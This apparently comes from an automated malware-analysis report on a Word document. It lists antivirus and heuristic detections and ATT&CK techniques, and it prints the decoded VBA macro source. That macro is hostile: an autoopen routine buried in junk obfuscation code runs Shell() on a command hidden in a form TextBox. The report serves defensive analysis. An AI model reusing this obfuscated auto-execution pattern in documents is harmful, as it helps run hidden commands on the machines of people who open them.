MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros, including an autoopen macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, strongly suggesting the macro attempts to execute external commands or download and run a payload. The presence of the 'SC_STR_CMD' heuristic further supports the execution of command-line tools.
Heuristics 8
-
ClamAV: Doc.Malware.Generic-6789116-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6789116-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
End Select a410646206 = Array(P4411837, t36106, M29019, Interaction.Shell(R669511167556.TextBox1, 70 - 70), S68298055) Select Case H964 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() B03852785 -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5610 bytes |
SHA-256: 1594dcdac23c4ccce7457e6a19f3eb4c734c5eb273844295d4168c8c3bc25326 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "R669511167556"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
B03852785
End Sub
Attribute VB_Name = "M68922500"
Function B03852785()
On Error Resume Next
Select Case w715
Case 195583029
X0259 = J609
w1397 = Tan(o2054 - Round(R6601) / 300862149 - Tan(Q456))
q129 = C6607
F5431 = Round(N622 * Chr(96161541))
Case 285282511
R2275 = a5611
a9200 = 278827374
l6568 = X0294
b236 = Round(w9151 + Tan(i4366 + Log(149593183) - h337 / Hex(38894532)))
End Select
Select Case O6086
Case 176691007
h4660 = d572
i248 = Tan(q7821 - Round(O9478) / 91920287 - Tan(j8217))
H4031 = M183
L366 = Round(F945 * Chr(240976916))
Case 16844856
L3737 = Q166
f695 = 226133061
q0671 = d826
O7221 = Round(k0506 + Tan(U288 + Log(264481712) - C3724 / Hex(221657219)))
End Select
Select Case d013
Case 262332792
H787 = s9284
f2451 = Tan(T349 - Round(n192) / 191867258 - Tan(G612))
h5173 = i6239
p350 = Round(Y8056 * Chr(278079560))
Case 305125901
m7371 = O806
Q4397 = 284936048
B9010 = T724
L162 = Round(Z940 + Tan(J659 + Log(234136245) - i2394 / Hex(194925631)))
End Select
a410646206 = Array(P4411837, t36106, M29019, Interaction.Shell(R669511167556.TextBox1, 70 - 70), S68298055)
Select Case H964
Case 298058487
i770 = U6148
L388 = Tan(R809 - Round(B3472) / 150406317 - Tan(U0274))
F654 = I2165
R1938 = Round(n503 * Chr(188945220))
Case 118967965
T807 = U7490
K0008 = 240125079
Y9931 = i7543
C633 = Round(z364 + Tan(o352 + Log(92071163) - m687 / Hex(100962252)))
End Select
Select Case c097
Case 316055481
J1308 = r905
b5304 = Tan(f021 - Round(B4573) / 156489417 - Tan(i2015))
n384 = u3447
j732 = Round(N8884 * Chr(24308994))
Case 284087991
F241 = P951
J2732 = 82244940
Y7801 = L6002
i075 = Round(N763 + Tan(E9167 + Log(18403586) - w176 / Hex(9309268)))
End Select
Select Case i651
Case 208398389
X8290 = d3761
R6089 = Tan(D9000 - Round(b6655) / 283995392 - Tan(k501))
W3361 = E579
R5076 = Round(m959 * Chr(133378021))
Case 95939770
Y198 = T646
O765 = 295083469
t5288 = A528
i2681 = Round(o1054 + Tan(M349 + Log(47959884) - w0692 / Hex(208582407)))
End Select
Select Case s1231
Case 121717465
K7586 = N135
o713 = Tan(d5235 - Round(S061) / 288747315 - Tan(t264))
r7530 = L983
u560 = Round(J6991 * Chr(156412198))
Case 295065868
X263 = I191
n496 = 208693067
z571 = D260
k7857 = Round(q299 + Tan(w872 + Log(65635896) - Q8687 / Hex(333656876)))
End Select
End Function
Attribute VB_Name = "U27411041501"
Attribute VB_Name = "v162431780460"
Attribute VB_Name = "i15589039543"
Attribute VB_Name = "C33117811"
Attribute VB_Name = "Z8481611854563"
Attribute VB_Name = "k88016588150397"
Attribute VB_Name = "L166804288887"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "h13448047"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "B2998430"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "V2097988115786"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "j903807892"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w45884303579276"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "S43157418255"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.